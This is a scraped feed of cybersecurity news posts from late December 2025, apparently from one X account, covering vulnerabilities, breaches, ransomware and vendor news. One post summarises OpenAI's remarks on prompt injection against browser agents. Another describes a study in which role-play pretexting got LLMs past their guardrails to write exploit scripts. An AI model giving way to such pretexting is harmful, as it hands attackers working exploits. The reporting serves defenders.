"🚨 CrowdStrike Launches Falcon for IT Turnkey Automations (GA) CrowdStrike says Falcon for IT now offers generally available turnkey automations (prebuilt content packs) to automate common IT/security workflows, like application resilience/health checks, file indexing for investigations and Linux device control, without custom scripting. This reduces operational overhead and speeds response by running automation through the existing Falcon sensor and providing dashboards to track outcomes. 🕷 Malware: N/A 🎯 Target: Global / Enterprise IT & SOC Operations # Category: #CrowdStrike #Falcon"
X Link 2025-12-30T00:08Z [--] followers, [--] engagements
"🚨 70000+ MongoDB Servers Exposed to MongoBleed zlib Memory-Leak Attacks MongoDB's CVE-2025-14847 allows unauthenticated attackers to leak uninitialized heap memory via zlib-compressed traffic, potentially exposing secrets like credentials and API keys from vulnerable internet-facing instances. Immediate upgrades (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression are the primary mitigations. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Internet-exposed MongoDB # Category: #MongoDB #MongoBleed #CVE2025_14847 #Vulnerability #Exploit"
X Link 2025-12-30T06:17Z [--] followers, [--] engagements
"🚨 Executives Say Cybersecurity Has Outgrown IT: Risk Now Drives Strategy A Rimini Street global exec survey shows cyber threats are now the top external risk (54%), pushing security into enterprise risk management and continuity planning, while talent gaps and vendor pressure widen exposure. 43% already outsource cybersecurity (46% considering it) and 35% cite vendor lock-in/forced upgrades as a risk driver. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Leadership (Board, C-suite, critical sectors) # Category: #CyberRisk #CISO #RiskManagement #SecurityStrategy #Outsourcing #TalentGap"
X Link 2025-12-30T07:19Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Stolen After Oracle EBS Breach at Catering Supplier KC&D Korean Air says attackers stole data for [-----] current/former employees (including names and bank account numbers) after compromising its former subsidiary and current catering supplier KC&D, which has been linked to the wider Oracle E-Business Suite (EBS) exploitation/extortion campaign. The incident underscores vendor concentration risk in aviation and how enterprise app zero-days can rapidly translate into high-impact employee fraud exposure. 🕷 Malware: N/A 🎯 Target: South Korea / Aviation (Employees) #"
X Link 2025-12-30T09:22Z [--] followers, [--] engagements
"🚨 ServiceNow Buys Armis for $7.75B to Build an End-to-End Cyber-Physical Security Platform ServiceNow agreed to acquire Armis in a $7.75B all-cash deal to expand exposure management and cyber-physical security across IT, OT and medical devices. The goal is deeper asset visibility and faster risk prioritization via ServiceNow's security workflows as AI adoption increases attack surface complexity. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (IT+OT+Medical devices) # Category: #ServiceNow #Armis #MergersAndAcquisitions #CyberPhysicalSecurity #ExposureManagement #OTSecurity #MedDeviceSecurity"
X Link 2025-12-30T09:31Z [--] followers, [--] engagements
"🚨 CISA Loses Key Staffer Behind Pre-Ransomware Warnings Program CISA's Pre-Ransomware Notification Initiative (PRNI), which alerts organizations when ransomware actors are preparing to strike, faces uncertainty after its lead, David Stern, resigned following a forced reassignment. The program has issued thousands of warnings since [----] and CISA estimates it helped prevent roughly $9B in economic damages, so disruption could reduce early-warning coverage for critical sectors. 🕷 Malware: N/A 🎯 Target: USA / Government & Critical Infrastructure # Category: #CISA #Ransomware #ThreatIntel"
X Link 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 Palo Alto Networks: AI Security Is Really a Cloud Infrastructure Problem A Palo Alto Networks survey says 99% of organizations saw at least one attack on AI systems in the past year and argues most of the real risk sits in the cloud foundations (identity, permissions and monitoring) that run AI workloads. It recommends prioritizing identity security and integrating cloud telemetry directly into SOC workflows to reduce AI-driven exposure. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Cloud & AI Workloads # Category: #AISecurity #CloudSecurity #PaloAltoNetworks #IAM #SOC #GenAI"
X Link 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 How to Operationalize AI in the SOC: [--] Workflows That Actually Benefit The article lays out practical ways to embed AI into SOC operations (detection engineering, threat hunting, code/tooling support, orchestration design and reporting) while warning that out-of-the-box AI and unvalidated outputs create fragile, unsafe workflows. The key message: narrowly scope AI use cases, enforce human review gates for actions and standardize prompts/guardrails so AI outputs are testable and repeatable. 🕷 Malware: N/A 🎯 Target: Global / SOC & Enterprise Security Operations # Category: #SOC #AISecurity"
X Link 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 70000+ MongoDB Servers Still Vulnerable to MongoBleed (CVE-2025-14847) MongoBleed is a zlib-related unauthenticated memory disclosure flaw that can leak sensitive heap data (credentials, tokens, keys) from vulnerable MongoDB deployments, with large numbers of internet-exposed instances still at risk. The key action is immediate patching to fixed builds (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression as a temporary mitigation. 🕷 Malware: N/A (Vulnerability: MongoBleed / CVE-2025-14847) 🎯 Target: Global / Internet-Exposed MongoDB # Category: #MongoDB"
X Link 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 CISA Flags Actively Exploited MongoDB MongoBleed Flaw in KEV CISA added CVE-2025-14847 to the KEV catalog after active exploitation, warning it lets unauthenticated attackers read uninitialized heap memory via a Zlib header length-handling inconsistency, potentially leaking credentials/tokens from exposed MongoDB servers. Federal agencies must remediate by Jan [--] [----] (BOD 22-01), making immediate patching/mitigation a priority for all internet-facing deployments. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB Servers # Category: #MongoDB #MongoBleed #CVE2025_14847 #KEV"
X Link 2025-12-30T12:15Z [--] followers, [--] engagements
"🚨 [----] Cybersecurity M&A Mega-Deals: [--] Acquisitions Cleared the $1B Mark SecurityWeek tallied 420+ cybersecurity M&A deals in [----] ($84B disclosed), with eight $1B+ transactions driving nearly $75B, led by Google's $32B Wiz deal and Palo Alto Networks' $25B CyberArk buy. The consolidation signals buyers prioritizing cloud, identity and data-security platforms as must-have control planes for [----]. 🕷 Malware: N/A 🎯 Target: Global / Cybersecurity Industry (M&A) # Category: #Cybersecurity #MergersAndAcquisitions #MAndA #CloudSecurity #IdentitySecurity #DSPM #OTSecurity #MarketTrends 🔗 URL:"
X Link 2025-12-30T13:15Z [--] followers, [--] engagements
"🚨 LG Unveils Gallery TV to Challenge Samsung's The Frame at CES [----] LG is entering the art TV market with a flush-mount Frame-style Gallery TV built on Mini-LED with a matte/anti-glare screen, interchangeable frames and a Gallery+ art subscription to display curated artwork when idle. The move signals intensifying competition in lifestyle TVs, where always-on display modes and ecosystem services (art stores, apps, smart-home integration) are becoming the differentiators, not just panel tech. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home TV market) # Category: #LG #GalleryTV"
X Link 2025-12-30T15:24Z [--] followers, [--] engagements
"🚨 TCL Note A1 NXTPAPER: Digital Paper Tablet Brings 120Hz Full-Color Paper-Like Reading/Writing TCL announced the Note A1 NXTPAPER, combining its NXTPAPER paper-like display tech with a full-color LCD and a 120Hz refresh rate to reduce ghosting while staying eye-comfort focused for long reading and stylus work. It's positioned as a Kindle Scribe/reMarkable alternative with productivity features (stylus + meeting transcription/translation) and is expected to launch via crowdfunding soon. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tech (Tablets, e-notes, productivity) # Category: #TCL #NXTPAPER"
X Link 2025-12-30T15:29Z [--] followers, [--] engagements
"🚨 Legends Never Die: A Backstage Pass to Broadcom's [----] Cybersecurity Tour Broadcom's Symantec and Carbon Black recap their [----] Legends Never Die conference circuit (e.g. Google Cloud Next, RSAC, Black Hat/DEF CON), emphasizing AI/ML-driven defense demos, partner ecosystem wins and updated threat intel messaging. It's essentially a marketing-driven field report on how they're positioning enterprise security offerings and AI capabilities heading into [----]. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Security Teams & Channel Partners # Category: #Cybersecurity #ThreatIntel #SOC #AI #XDR"
X Link 2025-12-30T15:31Z [--] followers, [--] engagements
"🚨 Trend Micro Helps INTERPOL's Operation Sentinel Bust Africa-Linked Digital Extortion Networks Trend Micro says its intel mapped 2700+ malicious infrastructures/IPs and detected 43000+ digital extortion email attempts tied to Africa-region senders, supporting INTERPOL's Operation Sentinel that led to [---] arrests and $3M recovered. The campaign data shows extortion lures were primarily English/Portuguese and largely targeted victims outside Africa (notably the Americas and Europe), highlighting cross-continental monetization and the need for stronger email controls and takedown coordination. 🕷"
X Link 2025-12-30T15:35Z [--] followers, [--] engagements
"🚨 HoneyMyte (Mustang Panda) Uses Signed Kernel Rootkit to Stealth-Deploy ToneShell Kaspersky reports the HoneyMyte/Mustang Panda cluster using a signed Windows mini-filter driver (ProjectConfiguration.sys) to blind Microsoft Defender and inject the ToneShell backdoor into a decoy svchost process, with C2 traffic disguised as fake TLS [---] over TCP/443. This kernel-mode delivery boosts persistence and evasion, raising incident-response difficulty for targeted government networks in Myanmar and Thailand. 🕷 Malware: ToneShell (kernel-mode rootkit loader) 🎯 Target: Asia / Government (Myanmar"
X Link 2025-12-30T16:40Z [--] followers, [--] engagements
"🚨 Samsung Previews CES [----] Home Audio: New Q-Series Soundbars + Music Studio Wi-Fi Speakers Samsung is teasing its [----] audio lineup ahead of CES, adding refreshed Q-Series soundbars and new Music Studio Wi-Fi speakers aimed at tighter SmartThings/TV integration and more immersive AI-tuned playback. The update reinforces the ecosystem audio trend, where speakers and soundbars operate as coordinated endpoints across TVs and smart-home routines. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home Audio) # Category: #Samsung #CES2026 #Soundbars #WiFiSpeakers #SmartThings #HomeAudio"
X Link 2025-12-30T16:42Z [--] followers, [--] engagements
"🚨 OpenAI: Prompt Injection May Never Be Solved for Browser Agents Like ChatGPT Atlas OpenAI says it shipped a security update after internal automated red-teaming uncovered a new class of prompt-injection attacks, adding an adversarially trained model and stronger safeguards. It now uses an RL-trained automated attacker plus counterfactual rollouts to iterate on multi-step injection chains before they appear in the wild. 🕷 Malware: N/A 🎯 Target: Global / AI Browser Agents (Enterprise workflows: email, docs, web apps) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity"
X Link 2025-12-30T16:44Z [--] followers, [--] engagements
"🚨 Magecart Fake Checkout Surge: 50+ Malicious Scripts Hijack Payment Flows A large-scale Magecart operation is using 50+ modular JavaScript skimmers that detect the victim's payment gateway (e.g. Stripe/PayPal/Mollie) and dynamically inject localized fake payment forms to steal card and account data while evading modern defenses. 🕷 Malware: Magecart (malicious web skimmer scripts) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart #Ecommerce #WebSkimming #JavaScript #PaymentFraud #SupplyChain #Infostealer #DigitalSkimmer 🔗 URL: https://gbhackers.com/magecart-campaign/"
X Link 2025-12-30T18:22Z [--] followers, [--] engagements
"🚨 ESET Warns AI-Powered Malware Is Now Operational PromptLock Signals a New Ransomware Era ESET reports that AI-driven malware is no longer theoretical, spotlighting PromptLock ransomware that can call LLMs (via the Ollama API) to generate and iteratively fix malicious Lua scripts at runtime, undermining signature-based detection. The same report also flags a sharp expansion in ransomware activity and a surge in BYOVD-style EDR-killer tooling, increasing the likelihood of fast, scalable intrusions across multiple sectors. 🕷 Malware: PromptLock (AI-powered ransomware) 🎯 Target:"
X Link 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915 CVSS 9.8) A critical authentication bypass in IBM API Connect lets remote attackers gain unauthorized access without credentials, impacting versions 10.0.8.0-10.0.8.5 and 10.0.11.0. Patch immediately (apply IBM iFix/security updates) and, if you can't patch yet, disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity #PatchNow #DevSecOps 🔗 URL:"
X Link 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 CISA Flags Active Exploitation of MongoBleed (CVE-2025-14847) in MongoDB CISA added CVE-2025-14847 to its KEV catalog after real-world exploitation was observed; the flaw stems from zlib-compressed protocol header length handling and can let unauthenticated attackers read uninitialized heap memory, potentially leaking credentials, tokens or sensitive data from exposed MongoDB servers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) # Category: #MongoDB #CVE202514847 #MongoBleed #CISA #KEV #Vulnerability #DataLeak #DatabaseSecurity #PatchNow 🔗 URL:"
X Link 2025-12-30T18:33Z [--] followers, [--] engagements
"🚨 Massive Magecart Wave: 50+ Web Skimmers Inject Fake Checkout Pages Researchers report a large Magecart operation using 50+ distinct malicious JavaScript skimmers that fingerprint the victim site's payment flow and dynamically inject localized fake checkout forms to steal card data and credentials while evading detection. The scale and modular design make this a high-impact e-commerce supply-chain risk, especially for sites relying on third-party scripts and tag managers. 🕷 Malware: Magecart (web skimmer JavaScript) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart"
X Link 2025-12-30T20:17Z [--] followers, [--] engagements
"🚨 Coupang Offers $1.17B in Vouchers After Massive 33.7M-Account Data Breach Coupang will issue four vouchers totaling [-----] won ($1.17B aggregate) to [----] million notified account holders starting Jan [--], after a breach that began June [--] [----] and exposed personal data (names, email, phone, addresses, some order history) but reportedly not payment or login credentials, highlighting escalating regulatory, class-action and trust risk for major consumer platforms. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Logistics # Category: #DataBreach #Coupang #Korea #Privacy #PII #IncidentResponse"
X Link 2025-12-30T21:18Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915) Exposes API Gateways to Remote Takeover IBM warns of an authentication-bypass flaw (CVSS 9.8) that could let unauthenticated remote attackers access IBM API Connect, potentially enabling configuration tampering and downstream compromise of managed APIs. Affected versions (10.0.8.0-10.0.8.5 and 10.0.11.0) should apply IBM iFixes immediately; if patching is delayed, disable Developer Portal self-service sign-up as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915"
X Link 2025-12-30T22:50Z [--] followers, [--] engagements
"🚨 Critical SmarterMail Flaw Lets Unauthenticated Attackers Upload Files and Potentially Achieve RCE CVE-2025-52691 (CVSS 10.0) allows unauthenticated arbitrary file upload to any location on SmarterMail servers, which can be chained into remote code execution and full mail server takeover. SmarterTools says builds before [----] are affected and urges upgrading to Build 9413+ immediately, especially for internet-facing mail servers. 🕷 Malware: N/A 🎯 Target: Global/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #ArbitraryFileUpload #EmailSecurity"
X Link 2025-12-30T22:52Z [--] followers, [---] engagements
"🚨 CISA Flags Actively Exploited MongoBleed Bug in MongoDB Server (CVE-2025-14847) CVE-2025-14847 is a zlib-compressed protocol header length-handling flaw that lets unauthenticated attackers remotely read uninitialized heap memory, potentially leaking credentials, session tokens or encryption keys from exposed MongoDB servers. CISA added it to the KEV catalog on Dec [--] [----] and set a Jan [--] [----] remediation deadline, making urgent patching and credential rotation a priority for any internet-facing instances. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) #"
X Link 2025-12-30T22:54Z [--] followers, [--] engagements
"🚨 PoC Released for MongoBleed: 74K+ Exposed MongoDB Servers Still Unpatched A public proof-of-concept for CVE-2025-14847 (MongoBleed) is driving urgency as Shadowserver reports [-----] internet-exposed MongoDB instances still running vulnerable versions. The bug enables unauthenticated heap-memory disclosure via MongoDB's zlib-compressed protocol handling, risking leakage of sensitive in-memory data unless servers are urgently patched or zlib compression is disabled as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-exposed MongoDB) # Category:"
X Link 2025-12-30T22:59Z [--] followers, [---] engagements
"🚨 Ex-Coupang Insider Tosses MacBook in River to Destroy Evidence After Massive Data Breach A former Coupang employee allegedly used a stolen security key to access customer records, then smashed and dumped a MacBook Air weighted with bricks to erase traces, but investigators recovered the device and tied it to the suspect via serial number/iCloud. The case underscores how insider access + poor key controls can drive mega-breaches, and how forensics can still reconstruct activity even after attempted physical destruction. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Consumer Data #"
X Link 2025-12-30T23:01Z [--] followers, [--] engagements
"🚨 Critical 0-Day Root RCE in XSpeeder Devices Exposes 70000+ Hosts CVE-2025-54322 is an unauthenticated root RCE in XSpeeder SXZOS devices where a web-auth component uses unsafe eval() on base64-decoded query input, enabling one-request command execution and rapid perimeter compromise. With 70K internet-exposed systems and an unresponsive vendor, defenders should urgently isolate/ACL these devices and hunt for web-shell-like artifacts and suspicious GET-based payload attempts. 🕷 Malware: N/A 🎯 Target: Global/Industrial & Branch Networking (XSpeeder SXZOS) # Category: #ZeroDay #RCE"
X Link 2025-12-30T23:07Z [--] followers, [--] engagements
"🚨 Logitech Zone Wireless [--] ES Review: Business Headset Built to Tame Noisy Open Offices Logitech's Zone Wireless [--] ES is positioned as an ANC-forward headset for clearer enterprise calls in loud environments, improving meeting confidentiality and voice intelligibility. The security tradeoff is added endpoint surface (Bluetooth/dongle firmware and UC integrations), so it should be managed like any other corporate peripheral (updates, device controls and policy). 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Unified Communications & Open Office) # Category: #Logitech #Headset #ANC"
X Link 2025-12-31T02:40Z [--] followers, [--] engagements
"🚨 Defenders Falling Behind: Threat-Led Data Shows Attackers Evolve Faster Than Coverage Tidal Cyber's [----] Threat-Led Defense Report finds adversaries rapidly shifting TTP execution (cloud/SaaS abuse, social engineering resurgence, ransomware fragmentation and broader zero-day use), creating procedure-level blind spots where controls miss real intrusions even when the technique is known. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #ThreatIntel #ThreatLedDefense #TTPs #MITREATTACK #Ransomware #SocialEngineering #ZeroDay #SaaS #CloudSecurity #TidalCyber 🔗 URL:"
X Link 2025-12-31T06:45Z [--] followers, [--] engagements
"🚨 AI-Enhanced InternalWhisper Crypter Markets FUD Evasion Against Windows Defender A new dark-web crypter/loader called InternalWhisper x ImpactSolutions claims an AI-driven metamorphic engine that rewrites 99% of code per build, producing signature-less binaries while using AES-256 runtime encryption and stealth loaders (direct syscalls, process hollowing, signed-binary sideloading) to evade AV/EDR, reducing the effectiveness of static detection and accelerating commodity malware deployment. 🕷 Malware: InternalWhisper x ImpactSolutions (AI-enhanced crypter/loader) 🎯 Target: Global/Windows"
X Link 2025-12-31T06:47Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Ships Major Tunnel + UI Upgrades Boosting C2 Operator Speed AdaptixC2 v1.0 overhauls SOCKS4/5 tunneling to be RFC-compliant, adds IPv6 support and improves client responsiveness via async execution/text batching, making port-scans and pivoting more reliable and faster. It also adds remote shell/SSH-like terminal tabs plus new BOFs (LDAP, DCSync, nbtscan, runas) and introduces breaking DB changes, which matters because better legit red team tooling is routinely repurposed by real attackers. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Monitoring"
X Link 2025-12-31T06:49Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Released With Faster More Reliable Tunneling and UI Upgrades AdaptixC2's latest release improves SOCKS4/5 tunneling (RFC compliance), adds IPv6 support and boosts responsiveness via async client/server operations and text batching to prevent UI freezes. It also introduces a new profile system with autosave, updated session/listener management and database-size controls that defenders should account for when hunting C2 activity. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Red Teams & Post-Exploitation Operations # Category: #AdaptixC2 #C2 #PostExploitation #RedTeam"
X Link 2025-12-31T07:56Z [--] followers, [--] engagements
"🚨 Open-Source AdaptixC2 v1.0 Launches With Faster SOCKS Tunnels and New BOFs AdaptixC2's v1.0 release improves SOCKS4/5 tunneling stability, adds IPv6 support and introduces UI/workflow upgrades (async execution, terminal tabs) plus new Beacon Object Files like LDAP and DCSync, features that can materially increase attacker/operator efficiency if abused outside legitimate red teaming. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Defending Against Post-Exploitation C2 # Category: #AdaptixC2 #C2 #RedTeam #PostExploitation #SOCKS5 #IPv6 #BOF #ThreatHunting 🔗 URL:"
X Link 2025-12-31T07:58Z [--] followers, [--] engagements
"🚨 Dark-Web InternalWhisper AI Crypter Claims FUD Evasion by Metamorphic Rewrites A threat actor is advertising InternalWhisper x ImpactSolutions, an AI-enhanced metamorphic crypter that claims to generate signature-free builds by rewriting code per build, encrypting payloads (AES-256) and using in-memory execution plus techniques like direct syscalls/process hollowing and signed-binary sideloading. If real, it accelerates commodity malware at scale by degrading static detection and pushing defenders toward behavioral/telemetry-driven controls. 🕷 Malware: InternalWhisper x ImpactSolutions"
X Link 2025-12-31T08:00Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Flaw Lets Users Hijack Admin Accounts (CVE-2025-47411) A privilege-escalation bug in Apache StreamPipes (0.69.0–0.97.0) allows any authenticated non-admin to manipulate JWT/token user identity (e.g. swapping their username to an existing admin) and gain full administrative control, enabling data access/tampering and pipeline compromise; upgrade to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics Platforms (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability"
X Link 2025-12-31T08:30Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Bug Lets Low-Privilege Users Hijack Admin Control CVE-2025-47411 impacts Apache StreamPipes 0.69.0–0.97.0, allowing any authenticated non-admin to manipulate JWT/user-ID handling to impersonate an existing administrator and take over the platform. Upgrade to 0.98.0 immediately to prevent full pipeline/data tampering and backdoor account creation. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow #DataSecurity 🔗 URL:"
X Link 2025-12-31T09:03Z [--] followers, [--] engagements
"🚨 MongoBleed Exploitation Hotspots: U.S., China and EU Lead Global Exposure MongoBleed (CVE-2025-14847) is a pre-auth zlib compression flaw in MongoDB that lets attackers remotely leak uninitialized process memory (e.g. credentials/tokens) from unpatched servers, with large concentrations of exposed instances in China and the U.S. The bug is already being exploited, prompting CISA KEV inclusion and rapid patching/mitigation pressure across cloud and hosting providers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (US, China, EU-heavy exposure) # Category: #MongoDB #MongoBleed"
X Link 2025-12-31T09:33Z [--] followers, [--] engagements
"🚨 Mapping the Next Cold War: Why US Strategy on China and Russia Must Get Specific WIRED argues the US has drifted without a coherent grand strategy for great-power competition with China and Russia, and that treating today as a simple Cold War analogy obscures key differences like economic interdependence and the rise of nonaligned mid-powers. 🕷 Malware: N/A 🎯 Target: Global/Geopolitics # Category: #Geopolitics #NationalSecurity #ColdWar #China #Russia #USPolicy #CyberPolicy 🔗 URL: https://www.wired.com/story/discovering-the-dimensions-of-a-new-cold-war/"
X Link 2025-12-31T10:36Z [--] followers, [--] engagements
"🚨 NeuroSploit v2: AI-Powered Pentesting Framework Using GPT/Claude/Gemini/Ollama NeuroSploit v2 is a modular GitHub-hosted framework that uses specialized LLM agents (red team, bug bounty, malware analyst, blue team) and integrates tools like Nmap, Metasploit, Nuclei and SQLMap to accelerate recon and vulnerability analysis. Its main risk is operational: it can compress high-skill workflows into repeatable playbooks, so defenders should expect faster time-to-exploit and prioritize behavioral detection and strict tool/use governance. 🕷 Malware: NeuroSploit v2 (tool) 🎯 Target: Global/Offensive"
X Link 2025-12-31T11:49Z [--] followers, [--] engagements
"🚨 LinkedIn Job Scams Surge Globally: Fake Recruiters Monetize Jobseekers' Desperation Fraudsters posing as employers on LinkedIn persuade applicants to pay fees (background checks, onboarding, training, visa processing), with tactics varying by region and often escalating into credential theft or identity-fraud exposure. The bigger risk is organizational: stolen LinkedIn accounts and harvested personal data enable highly believable BEC-style impersonation and targeted spear-phishing into real companies. 🕷 Malware: N/A 🎯 Target: Global/Jobseekers & Recruiting (Social Media Platforms) # Category:"
X Link 2025-12-31T12:50Z [--] followers, [--] engagements
"🚨 Shai-Hulud Supply Chain Worm Fueled $8.5M Trust Wallet Chrome Extension Heist Trust Wallet says Shai-Hulud [---] leaked its developer GitHub secrets, letting attackers use a stolen Chrome Web Store API key to publish a backdoored Trust Wallet extension (v2.68) that pulled malicious code from an attacker domain and drained [----] wallets ($8.5M) between Dec 24–26, highlighting how npm/GitHub credential theft can directly translate into consumer crypto theft via compromised release pipelines. 🕷 Malware: Shai-Hulud [---] (self-replicating npm supply-chain worm) + backdoored Trust Wallet Chrome"
X Link 2025-12-31T12:52Z [--] followers, [--] engagements
"🚨 Cl0p Leaks [-----] Korean Air Employee Records After Third-Party ERP Breach Cl0p claims it compromised Korean Air's catering partner KC&D Service by exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882), then leaked employee names and bank account numbers from the partner's ERP server (hundreds of GB posted after alleged ransom refusal). This is high-risk for payroll fraud and targeted phishing, and it highlights third-party ERP weak links as a repeatable intrusion path. 🕷 Malware: Cl0p (ransomware/extortion group) 🎯 Target: South Korea/Aviation (employee PII via third-party"
X Link 2025-12-31T12:54Z [--] followers, [---] engagements
"🚨 [----] Cybersecurity Forecast: AI Arms Race and Autonomous Self-Learning Malware Dark Reading predicts [----] will see attackers scale AI-driven phishing, deepfakes and automated vuln exploitation while defenders race to deploy agentic automation for detection and containment. It warns of emerging malware autonomy (self-learning, tactic-shifting worms) and accelerating vendor consolidation/platformization that could reshape how security teams buy and operate tooling. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #CyberPredictions #AI #AgenticAI #AutonomousMalware #ThreatLandscape"
X Link 2025-12-31T12:56Z [--] followers, [--] engagements
"🚨 Qilin Ransomware Claims New Breaches Across Israel and the U.S. The Qilin ransomware group alleges it breached three organizations: TaLachaim (Israel, stem cell preservation/medical services), Quasar Data Center (Houston colocation/cloud/BCP) and Z-Tronix (California manufacturing), signaling continued multi-sector extortion pressure and potential data-theft risk for healthcare and critical IT service providers. 🕷 Malware: Qilin Ransomware 🎯 Target: Israel/Healthcare + USA/Cloud & Manufacturing # Category: #Ransomware #Qilin #DataBreach #Israel #USA #Healthcare #DataCenter #Manufacturing"
X Link 2025-12-31T12:59Z [--] followers, [--] engagements
"🚨 Threat Actors Manipulate LLMs to Automate Exploit Creation Against Enterprise Apps A new study shows attackers can social-engineer mainstream LLMs (e.g. GPT-4o/Claude) using structured pretexting (Role-play, Scenario, Action) to bypass safety guardrails and reliably generate functional exploit scripts, reportedly achieving 100% success in weaponizing Odoo ERP CVEs. This collapses the traditional skill barrier for exploitation and forces defenders to assume faster time-to-exploit even from low-skill actors. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Software (Odoo ERP & open-source stacks) #"
X Link 2025-12-31T14:01Z [--] followers, [--] engagements
"🚨 APT36 Abuses PDF.lnk Shortcuts to Drop In-Memory .NET RAT on Indian Government Targets APT36 (Transparent Tribe) is sending spear-phishing ZIP lures ("Online JLPT Exam Dec") containing a fake PDF that is actually a large .pdf.lnk; opening it launches mshta.exe to pull a remote HTA (innlive.in) that Base64+XOR-decodes ReadOnly/WriteOnly blocks and loads an encrypted RAT DLL directly in memory while displaying a real PDF as a decoy. 🕷 Malware: APT36 in-memory .NET RAT (DLL) 🎯 Target: India/Government & Strategic Entities # Category: #APT36 #TransparentTribe #SpearPhishing #LNK #MSHTA #HTA"
X Link 2025-12-31T14:03Z [--] followers, [--] engagements
"🚨 AI Skepticism Surges as ROI Disappoints and Bubble Fears Grow As AI stock momentum cools and many enterprises report weak returns from GenAI pilots, prominent critics argue vendors overpromised while real-world reliability and cost issues persist. In cybersecurity, AI can accelerate vulnerability discovery/patching, but measurable benefits remain uneven and AI-washing concerns are rising. 🕷 Malware: N/A 🎯 Target: Global/Enterprises & Cybersecurity Operations # Category: #AI #GenAI #Cybersecurity #AIROI #AIBubble #AIWashing #SecurityAutomation #RiskManagement 🔗 URL:"
X Link 2025-12-31T15:04Z [--] followers, [--] engagements
"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915) Puts Exposed API Gateways at Risk IBM disclosed a critical authentication bypass (CVSS 9.8) in API Connect that can let remote attackers gain unauthorized access on affected versions (10.0.8.0–10.0.8.5, 10.0.11.0). Apply IBM's interim fix from Fix Central immediately; if you can't, disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management, IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #APISecurity #CriticalVuln #PatchNow #DevSecOps 🔗 URL:"
X Link 2025-12-31T15:08Z [--] followers, [--] engagements
"🚨 When the Cloud Goes Down Your Smart Devices Go Dumb Dark Reading highlights how mounting cloud outages (AWS, Cloudflare, Azure) are increasingly disrupting IoT-dependent daily life (smart homes, alarms, thermostats and routines) because many devices can't function without constant cloud connectivity. A mid-October AWS outage that lasted nearly [--] hours underscored the risk of centralized dependencies, making offline/fail-safe modes and resilience engineering a security and safety priority. 🕷 Malware: N/A 🎯 Target: Global/IoT & Smart Home Ecosystem # Category: #IoT #CloudOutage #Resilience"
X Link 2025-12-31T15:12Z [--] followers, [--] engagements
"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915, CVSS 9.8) A critical authentication-bypass flaw in IBM API Connect lets unauthenticated attackers gain unauthorized access on affected versions (10.0.8.0–10.0.8.5 and 10.0.11.0), risking API gateway takeover and downstream compromise of managed APIs. Patch immediately using IBM's interim fixes; if patching is delayed, disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management, IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity"
X Link 2025-12-31T15:15Z [--] followers, [--] engagements
